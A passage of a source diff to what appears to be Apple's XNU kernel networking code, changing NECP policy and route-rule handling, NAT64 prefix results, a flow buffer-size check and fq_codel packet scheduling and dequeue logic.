*route_rule = necp_lookup_route_rule_locked(&necp_route_rules, route_rule_id); + if (route_rule == NULL) { + return 0; + } + + // No netagent, skip + if (route_rule->netagent_id == 0) { + return 0; + } + + if (route_rule->default_action == NECP_ROUTE_RULE_USE_NETAGENT) { + return route_rule->netagent_id; + } + + for (int exception_index = 0; exception_index < MAX_ROUTE_RULE_INTERFACES; exception_index++) { + if (route_rule->exception_if_indices[exception_index] == 0) { + break; + } + if (route_rule->exception_if_indices[exception_index] == ifp->if_index && + route_rule->exception_if_actions[exception_index] == NECP_ROUTE_RULE_USE_NETAGENT) { + return route_rule->netagent_id; + } + } + + if (route_rule->cellular_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_type == IFT_CELLULAR) { + return route_rule->netagent_id; + } + + if (route_rule->wifi_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_family == IFNET_FAMILY_ETHERNET && ifp->if_subfamily == IFNET_SUBFAMILY_WIFI) { + return route_rule->netagent_id; + } + + if (route_rule->wired_action == NECP_ROUTE_RULE_USE_NETAGENT && + (ifp->if_family == IFNET_FAMILY_ETHERNET || ifp->if_family == IFNET_FAMILY_FIREWIRE)) { + return route_rule->netagent_id; + } + + if (route_rule->expensive_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_eflags & IFEF_EXPENSIVE) { + return route_rule->netagent_id; + } + + if (route_rule->constrained_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_xflags & IFXF_CONSTRAINED) { + return route_rule->netagent_id; + } + + return 0; +} + bool necp_packet_is_allowed_over_interface(struct mbuf *packet, struct ifnet *interface) { @@ -9604,9 +9849,9 @@ necp_packet_filter_tags_receive(u_int16_t pf_tag, u_int32_t pass_flags) } static bool -necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) +necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { - u_int32_t verifyifindex = interface ? interface->if_index : 0; + u_int32_t verifyifindex = input_interface ? input_interface->if_index : 0; bool allowed_to_receive = TRUE; struct necp_socket_info info; u_int32_t flowhash = 0; @@ -9672,7 +9917,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr } else { if (inp->inp_policyresult.results.route_rule_id != 0) { lck_rw_lock_shared(&necp_kernel_policy_lock); - if (!necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) { + if (!necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) { route_allowed = FALSE; } lck_rw_done(&necp_kernel_policy_lock); @@ -9683,7 +9928,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr if (!route_allowed || inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP || inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT || - (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface && + (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface && inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex)) { allowed_to_receive = FALSE; } else { @@ -9713,7 +9958,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr // Actually calculate policy result lck_rw_lock_shared(&necp_kernel_policy_lock); - necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); + necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, input_interface != NULL ? true : false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); flowhash = necp_socket_calc_flowhash_locked(&info); if (inp->inp_policyresult.policy_id != NECP_KERNEL_POLICY_ID_NONE && @@ -9721,10 +9966,10 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr inp->inp_policyresult.flowhash == flowhash) { if (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP || inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT || - (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface && + (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface && inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex) || (inp->inp_policyresult.results.route_rule_id != 0 && - !necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) { + !necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) { allowed_to_receive = FALSE; } else { if (return_policy_id) { @@ -9780,13 +10025,13 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr if (matched_policy->result == NECP_KERNEL_POLICY_RESULT_DROP || matched_policy->result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT || - (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface && + (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface && matched_policy->result_parameter.tunnel_interface_index != verifyifindex) || ((service_action == NECP_KERNEL_POLICY_RESULT_TRIGGER_SCOPED || service_action == NECP_KERNEL_POLICY_RESULT_NO_TRIGGER_SCOPED) && service.identifier != 0 && service.identifier != NECP_NULL_SERVICE_ID) || (route_rule_id != 0 && - !necp_route_is_allowed(route, interface, route_rule_id, &interface_type_denied)) || + !necp_route_is_allowed(route, input_interface, route_rule_id, &interface_type_denied)) || !necp_netagents_allow_traffic(netagent_ids, NECP_MAX_NETAGENTS)) { allowed_to_receive = FALSE; } else { @@ -9845,7 +10090,8 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr lck_rw_done(&necp_kernel_policy_lock); - if (send_local_network_denied_event) { + if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) { + inp->inp_policyresult.network_denied_notifies++; necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid), ((so->so_flags & SOF_DELEGATED) ? so->e_uuid : so->last_uuid), NETPOLICY_NETWORKTYPE_LOCAL); @@ -9872,7 +10118,7 @@ done: } bool -necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) +necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { struct sockaddr_in local = {}; struct sockaddr_in remote = {}; @@ -9883,12 +10129,12 @@ necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, memcpy(&local.sin_addr, local_addr, sizeof(local.sin_addr)); memcpy(&remote.sin_addr, remote_addr, sizeof(remote.sin_addr)); - return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface, + return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface, pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags); } bool -necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) +necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { struct sockaddr_in6 local = {}; struct sockaddr_in6 remote = {}; @@ -9899,15 +10145,15 @@ necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, memcpy(&local.sin6_addr, local_addr, sizeof(local.sin6_addr)); memcpy(&remote.sin6_addr, remote_addr, sizeof(remote.sin6_addr)); - return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface, + return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface, pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags); } bool -necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, +necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { - return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, interface, pf_tag, + return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, input_interface, pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags); } diff --git a/bsd/net/necp.h b/bsd/net/necp.h index c2f39c6af..28c553dea 100644 --- a/bsd/net/necp.h +++ b/bsd/net/necp.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2013-2020 Apple Inc. All rights reserved. + * Copyright (c) 2013-2021 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -153,6 +153,7 @@ struct necp_packet_header { #define NECP_POLICY_CONDITION_SDK_VERSION 28 // struct necp_policy_condition_sdk_version #define NECP_POLICY_CONDITION_SIGNING_IDENTIFIER 29 // String #define NECP_POLICY_CONDITION_PACKET_FILTER_TAGS 30 // u_int16_t +#define NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY 32 // N/A /* * Policy Packet tags @@ -203,6 +204,7 @@ struct necp_packet_header { #define NECP_ROUTE_RULE_ALLOW_INTERFACE 2 // String, or empty to match all #define NECP_ROUTE_RULE_QOS_MARKING 3 // String, or empty to match all #define NECP_ROUTE_RULE_DENY_LQM_ABORT 4 // String, or empty to match all +#define NECP_ROUTE_RULE_USE_NETAGENT 5 // UUID, followed by string or empty #define NECP_ROUTE_RULE_FLAG_CELLULAR 0x01 #define NECP_ROUTE_RULE_FLAG_WIFI 0x02 @@ -311,6 +313,7 @@ struct necp_aggregate_result { u_int32_t policy_id; uuid_t netagents[NECP_MAX_NETAGENTS]; u_int32_t netagent_use_flags[NECP_MAX_NETAGENTS]; + struct ipv6_prefix nat64_prefixes[NAT64_MAX_NUM_PREFIXES]; u_int8_t mss_recommended; }; @@ -645,6 +648,7 @@ typedef struct necp_cache_buffer { #define NECP_CLIENT_RESULT_EFFECTIVE_TRAFFIC_CLASS 210 // u_int32_t #define NECP_CLIENT_RESULT_TRAFFIC_MGMT_BG 211 // u_int32_t, 1: background, 0: not background #define NECP_CLIENT_RESULT_GATEWAY 212 // struct necp_client_endpoint +#define NECP_CLIENT_RESULT_NAT64 213 // struct ipv6_prefix[NAT64_MAX_NUM_PREFIXES] #define NECP_CLIENT_RESULT_FLAG_IS_LOCAL 0x0001 // Routes to this device #define NECP_CLIENT_RESULT_FLAG_IS_DIRECT 0x0002 // Routes to directly accessible peer @@ -948,6 +952,8 @@ extern int necp_buffer_find_tlv(u_int8_t *buffer, u_int32_t buffer_length, int o #define NECPCTL_RESTRICT_MULTICAST 20 /* Restrict multicast access */ #define NECPCTL_DEDUP_POLICIES 21 /* Dedup overlapping policies */ +#define NECP_LOOPBACK_PASS_ALL 1 // Pass all loopback traffic +#define NECP_LOOPBACK_PASS_WITH_FILTER 2 // Pass all loopback traffic, but activate content filter and/or flow divert if applicable #define NECPCTL_NAMES { \ { 0, 0 }, \ @@ -1047,6 +1053,7 @@ struct necp_kernel_socket_policy { struct necp_policy_condition_sdk_version cond_sdk_version; char *cond_signing_identifier; // String u_int16_t cond_packet_filter_tags; + int32_t cond_pid_version; necp_kernel_policy_result result; necp_kernel_policy_result_parameter result_parameter; @@ -1116,12 +1123,13 @@ struct necp_aggregate_socket_result { }; struct necp_inpcb_result { - u_int32_t app_id; + u_int32_t app_id; necp_kernel_policy_id policy_id; necp_kernel_policy_id skip_policy_id; - int32_t policy_gencount; - u_int32_t flowhash; - struct necp_aggregate_socket_result results; + int32_t policy_gencount; + u_int32_t flowhash; + u_int32_t network_denied_notifies;// Notification count + struct necp_aggregate_socket_result results; }; extern errno_t necp_init(void); @@ -1142,18 +1150,18 @@ extern u_int32_t necp_socket_get_effective_mtu(struct inpcb *inp, u_int32_t curr extern bool necp_socket_is_allowed_to_recv_on_interface(struct inpcb *inp, ifnet_t interface); -extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag, +extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags); extern bool necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, - struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, + struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags); extern bool necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, - struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, + struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags); extern void necp_socket_update_qos_marking(struct inpcb *inp, struct rtentry *route, u_int32_t route_rule_id); diff --git a/bsd/net/necp_client.c b/bsd/net/necp_client.c index 0ef2776e3..bcd49fb78 100644 --- a/bsd/net/necp_client.c +++ b/bsd/net/necp_client.c @@ -1484,11 +1484,12 @@ static void necp_client_add_interface_option_if_needed(struct necp_client *client, uint32_t interface_index, uint32_t interface_generation, - uuid_t *nexus_agent) + uuid_t *nexus_agent, + bool network_provider) { - if (interface_index == IFSCOPE_NONE || + if ((interface_index == IFSCOPE_NONE && !network_provider) || (client->interface_option_count != 0 && !client->allow_multiple_flows)) { - // Interface not set, or client not allowed to use this mode + // Interface or agent not set, or client not allowed to use this mode return; } @@ -1913,7 +1914,8 @@ necp_client_add_browse_interface_options(struct necp_client *client, (flags & NETAGENT_FLAG_SUPPORTS_BROWSE) && (!(flags & NETAGENT_FLAG_SPECIFIC_USE_ONLY) || necp_netagent_is_required(parsed_parameters, &ifp->if_agentids[i]))) { - necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp), &ifp->if_agentids[i]); + necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp), + &ifp->if_agentids[i], (flags & NETAGENT_FLAG_NETWORK_PROVIDER)); // Finding one is enough break; @@ -3531,6 +3533,15 @@ necp_update_client_result(proc_t proc, client->result, sizeof(client->result)); } + for (int i = 0; i < NAT64_MAX_NUM_PREFIXES; i++) { + if (result.nat64_prefixes[i].prefix_len != 0) { + cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_NAT64, + sizeof(result.nat64_prefixes), result.nat64_prefixes, &updated, + client->result, sizeof(client->result)); + break; + } + } + if (result.mss_recommended != 0) { cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_RECOMMENDED_MSS, sizeof(result.mss_recommended), &result.mss_recommended, &updated, @@ -3616,7 +3627,7 @@ necp_update_client_result(proc_t proc, if (necp_ifnet_matches_parameters(multi_interface, parsed_parameters, 0, NULL, true, false)) { // Add multipath interface flows for kernel MPTCP necp_client_add_interface_option_if_needed(client, multi_interface->if_index, - ifnet_get_generation(multi_interface), NULL); + ifnet_get_generation(multi_interface), NULL, false); // Add nexus agents for multipath necp_client_add_agent_interface_options(client, parsed_parameters, multi_interface); @@ -3631,7 +3642,7 @@ necp_update_client_result(proc_t proc, // Add interface option in case it is not a nexus necp_client_add_interface_option_if_needed(client, direct_interface->if_index, - ifnet_get_generation(direct_interface), NULL); + ifnet_get_generation(direct_interface), NULL, false); } } else { // Get listener interface options from global list @@ -5635,7 +5646,8 @@ necp_client_add_flow(struct necp_fd_data *fd_data, struct necp_client_action_arg goto done; } - if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow)) { + if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow) || + buffer_size > sizeof(struct necp_client_add_flow_default) * 4) { error = EINVAL; NECPLOG(LOG_ERR, "necp_client_add_flow invalid buffer (length %zu)", buffer_size); goto done; diff --git a/bsd/net/pktsched/pktsched_fq_codel.c b/bsd/net/pktsched/pktsched_fq_codel.c index b34473e8b..c7d058ec2 100644 --- a/bsd/net/pktsched/pktsched_fq_codel.c +++ b/bsd/net/pktsched/pktsched_fq_codel.c @@ -29,21 +29,49 @@ #include #include #include +#include #include #include #include #include #include +#include + +#define FQ_CODEL_DEFAULT_QUANTUM 1500 + +#define FQ_CODEL_QUANTUM_BK_SYS(_q) (_q) +#define FQ_CODEL_QUANTUM_BK(_q) (_q) +#define FQ_CODEL_QUANTUM_BE(_q) (_q) +#define FQ_CODEL_QUANTUM_RD(_q) (_q) +#define FQ_CODEL_QUANTUM_OAM(_q) (_q) +#define FQ_CODEL_QUANTUM_AV(_q) (_q * 2) +#define FQ_CODEL_QUANTUM_RV(_q) (_q * 2) +#define FQ_CODEL_QUANTUM_VI(_q) (_q * 2) +#define FQ_CODEL_QUANTUM_VO(_q) ((_q * 2) / 5) +#define FQ_CODEL_QUANTUM_CTL(_q) ((_q * 2) / 5) + +#define FQ_CODEL_DRR_MAX_BK_SYS 2 +#define FQ_CODEL_DRR_MAX_BK 2 +#define FQ_CODEL_DRR_MAX_BE 4 +#define FQ_CODEL_DRR_MAX_RD 4 +#define FQ_CODEL_DRR_MAX_OAM 4 +#define FQ_CODEL_DRR_MAX_AV 6 +#define FQ_CODEL_DRR_MAX_RV 6 +#define FQ_CODEL_DRR_MAX_VI 6 +#define FQ_CODEL_DRR_MAX_VO 8 +#define FQ_CODEL_DRR_MAX_CTL 8 static ZONE_DECLARE(fq_if_zone, "pktsched_fq_if", sizeof(fq_if_t), ZC_ZFREE_CLEARMEM); +typedef STAILQ_HEAD(, flowq) flowq_dqlist_t; + static fq_if_t *fq_if_alloc(struct ifnet *, classq_pkt_type_t); static void fq_if_destroy(fq_if_t *fqs); static void fq_if_classq_init(fq_if_t *fqs, uint32_t priority, uint16_t quantum, uint32_t drr_max, uint32_t svc_class); static void fq_if_dequeue(fq_if_t *, fq_if_classq_t *, uint32_t, int64_t, classq_pkt_t *, classq_pkt_t *, uint32_t *, - uint32_t *, boolean_t drvmgmt); + uint32_t *, flowq_dqlist_t *, boolean_t drvmgmt); void fq_if_stat_sc(fq_if_t *fqs, cqrq_stat_sc_t *stat); static void fq_if_purge(fq_if_t *); static void fq_if_purge_classq(fq_if_t *, fq_if_classq_t *); @@ -51,7 +79,7 @@ static void fq_if_purge_flow(fq_if_t *, fq_t *, u_int32_t *, u_int32_t *); static void fq_if_empty_new_flow(fq_t *fq, fq_if_classq_t *fq_cl, bool add_to_old); static void fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, - fq_t *fq, bool remove_hash); + fq_t *fq, bool remove_hash, bool destroy); #define FQ_IF_FLOW_HASH_ID(_flowid_) \ (((_flowid_) >> FQ_IF_HASH_TAG_SHIFT) & FQ_IF_HASH_TAG_MASK) @@ -75,8 +103,8 @@ fq_if_append_mbuf(classq_pkt_t *pkt, classq_pkt_t *next_pkt) static boolean_t fq_getq_flow_mbuf(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, - int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *top, - classq_pkt_t *last, u_int32_t *byte_cnt, u_int32_t *pkt_cnt, + int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *head, + classq_pkt_t *tail, u_int32_t *byte_cnt, u_int32_t *pkt_cnt, boolean_t *qempty, u_int32_t pflags) { u_int32_t plen; @@ -95,15 +123,15 @@ fq_getq_flow_mbuf(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, fq->fq_deficit -= plen; pkt.pktsched_pkt_mbuf->m_pkthdr.pkt_flags |= pflags; - if (top->cp_mbuf == NULL) { - *top = pkt.pktsched_pkt; + if (head->cp_mbuf == NULL) { + *head = pkt.pktsched_pkt; } else { - ASSERT(last->cp_mbuf != NULL); - ASSERT(last->cp_mbuf->m_nextpkt == NULL); - last->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf; + ASSERT(tail->cp_mbuf != NULL); + ASSERT(tail->cp_mbuf->m_nextpkt == NULL); + tail->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf; } - *last = pkt.pktsched_pkt; - last->cp_mbuf->m_nextpkt = NULL; + *tail = pkt.pktsched_pkt; + tail->cp_mbuf->m_nextpkt = NULL; fq_cl->fcl_stat.fcl_dequeue++; fq_cl->fcl_stat.fcl_dequeue_bytes += plen; *pkt_cnt += 1; @@ -321,6 +349,11 @@ fq_if_enqueue_classq(struct ifclassq *ifq, classq_pkt_t *head, IFCQ_INC_BYTES(ifq, bytes); IFCQ_UNLOCK(ifq); done: +#if DEBUG || DEVELOPMENT + if (__improbable((ret == EQFULL) && (ifclassq_flow_control_adv == 0))) { + ret = 0; + } +#endif /* DEBUG || DEVELOPMENT */ return ret; } @@ -344,22 +377,80 @@ fq_if_dequeue_sc_classq(struct ifclassq *ifq, mbuf_svc_class_t svc, fq_cl = &fqs->fqs_classq[pri]; fq_if_dequeue(fqs, fq_cl, 1, CLASSQ_DEQUEUE_MAX_BYTE_LIMIT, - pkt, NULL, &total_pktcnt, &total_bytecnt, TRUE); + pkt, NULL, &total_pktcnt, &total_bytecnt, NULL, TRUE); IFCQ_XMIT_ADD(ifq, total_pktcnt, total_bytecnt); } +static inline void +fq_dqlist_add(flowq_dqlist_t *fq_dqlist_head, fq_t *fq) +{ + ASSERT(fq->fq_dq_head.cp_mbuf == NULL); + ASSERT(!fq->fq_in_dqlist); + STAILQ_INSERT_TAIL(fq_dqlist_head, fq, fq_dqlink); + fq->fq_in_dqlist = true; +} + +static inline void +fq_dqlist_remove(flowq_dqlist_t *fq_dqlist_head, fq_t *fq, classq_pkt_t *head, + classq_pkt_t *tail) +{ + ASSERT(fq->fq_in_dqlist); + if (fq->fq_dq_head.cp_mbuf == NULL) { + goto done; + } + + if (head->cp_mbuf == NULL) { + *head = fq->fq_dq_head; + } else { + ASSERT(tail->cp_mbuf != NULL); + + switch (fq->fq_ptype) { + case QP_MBUF: + ASSERT(tail->cp_mbuf->m_nextpkt == NULL); + tail->cp_mbuf->m_nextpkt = fq->fq_dq_head.cp_mbuf; + ASSERT(fq->fq_dq_tail.cp_mbuf->m_nextpkt == NULL); + break; + default: + VERIFY(0); + /* NOTREACHED */ + __builtin_unreachable(); + } + } + *tail = fq->fq_dq_tail; +done: + STAILQ_REMOVE(fq_dqlist_head, fq, flowq, fq_dqlink); + CLASSQ_PKT_INIT(&fq->fq_dq_head); + CLASSQ_PKT_INIT(&fq->fq_dq_tail); + fq->fq_in_dqlist = false; + if (fq->fq_flags & FQF_DESTROYED) { + fq_destroy(fq); + } +} + +static inline void +fq_dqlist_get_packet_list(flowq_dqlist_t *fq_dqlist_head, classq_pkt_t *head, + classq_pkt_t *tail) +{ + fq_t *fq, *tfq; + + STAILQ_FOREACH_SAFE(fq, fq_dqlist_head, fq_dqlink, tfq) { + fq_dqlist_remove(fq_dqlist_head, fq, head, tail); + } +} + int fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt, u_int32_t maxbytecnt, classq_pkt_t *first_packet, classq_pkt_t *last_packet, u_int32_t *retpktcnt, u_int32_t *retbytecnt) { - u_int32_t pktcnt = 0, bytecnt = 0, total_pktcnt = 0, total_bytecnt = 0; + uint32_t total_pktcnt = 0, total_bytecnt = 0; classq_pkt_t first = CLASSQ_PKT_INITIALIZER(fisrt); classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last); classq_pkt_t tmp = CLASSQ_PKT_INITIALIZER(tmp); fq_if_append_pkt_t append_pkt; + flowq_dqlist_t fq_dqlist_head; fq_if_classq_t *fq_cl; fq_if_t *fqs; int pri; @@ -367,6 +458,7 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt, IFCQ_LOCK_ASSERT_HELD(ifq); fqs = (fq_if_t *)ifq->ifcq_disc; + STAILQ_INIT(&fq_dqlist_head); switch (fqs->fqs_ptype) { case QP_MBUF: @@ -381,7 +473,8 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt, } for (;;) { - classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top); + uint32_t pktcnt = 0, bytecnt = 0; + classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head); classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail); if (fqs->fqs_bitmaps[FQ_IF_ER] == 0 && @@ -419,26 +512,22 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt, } } fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt), - (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt, - &bytecnt, FALSE); - if (top.cp_mbuf != NULL) { - ASSERT(pktcnt > 0 && bytecnt > 0); + (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt, + &bytecnt, &fq_dqlist_head, FALSE); + if (head.cp_mbuf != NULL) { + ASSERT(STAILQ_EMPTY(&fq_dqlist_head)); if (first.cp_mbuf == NULL) { - first = top; - total_pktcnt = pktcnt; - total_bytecnt = bytecnt; + first = head; } else { ASSERT(last.cp_mbuf != NULL); - append_pkt(&last, &top); - total_pktcnt += pktcnt; - total_bytecnt += bytecnt; + append_pkt(&last, &head); } last = tail; append_pkt(&last, &tmp); - fq_cl->fcl_budget -= bytecnt; - pktcnt = 0; - bytecnt = 0; } + fq_cl->fcl_budget -= bytecnt; + total_pktcnt += pktcnt; + total_bytecnt += bytecnt; /* * If the class has exceeded the budget but still has data @@ -464,6 +553,8 @@ state_change: } } + fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last); + if (__probable(first_packet != NULL)) { *first_packet = first; } @@ -493,6 +584,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc, classq_pkt_t first = CLASSQ_PKT_INITIALIZER(fisrt); classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last); fq_if_append_pkt_t append_pkt; + flowq_dqlist_t fq_dqlist_head; switch (fqs->fqs_ptype) { case QP_MBUF: @@ -506,6 +598,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc, __builtin_unreachable(); } + STAILQ_INIT(&fq_dqlist_head); pri = fq_if_service_to_priority(fqs, svc); fq_cl = &fqs->fqs_classq[pri]; /* @@ -515,28 +608,28 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc, */ while (total_pktcnt < maxpktcnt && total_bytecnt < maxbytecnt && fq_cl->fcl_stat.fcl_pkt_cnt > 0) { - classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top); + classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head); classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail); u_int32_t pktcnt = 0, bytecnt = 0; fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt), - (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt, - &bytecnt, TRUE); - if (top.cp_mbuf != NULL) { + (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt, + &bytecnt, &fq_dqlist_head, TRUE); + if (head.cp_mbuf != NULL) { if (first.cp_mbuf == NULL) { - first = top; - total_pktcnt = pktcnt; - total_bytecnt = bytecnt; + first = head; } else { ASSERT(last.cp_mbuf != NULL); - append_pkt(&last, &top); - total_pktcnt += pktcnt; - total_bytecnt += bytecnt; + append_pkt(&last, &head); } last = tail; } + total_pktcnt += pktcnt; + total_bytecnt += bytecnt; } + fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last); + if (__probable(first_packet != NULL)) { *first_packet = first; } @@ -581,10 +674,10 @@ 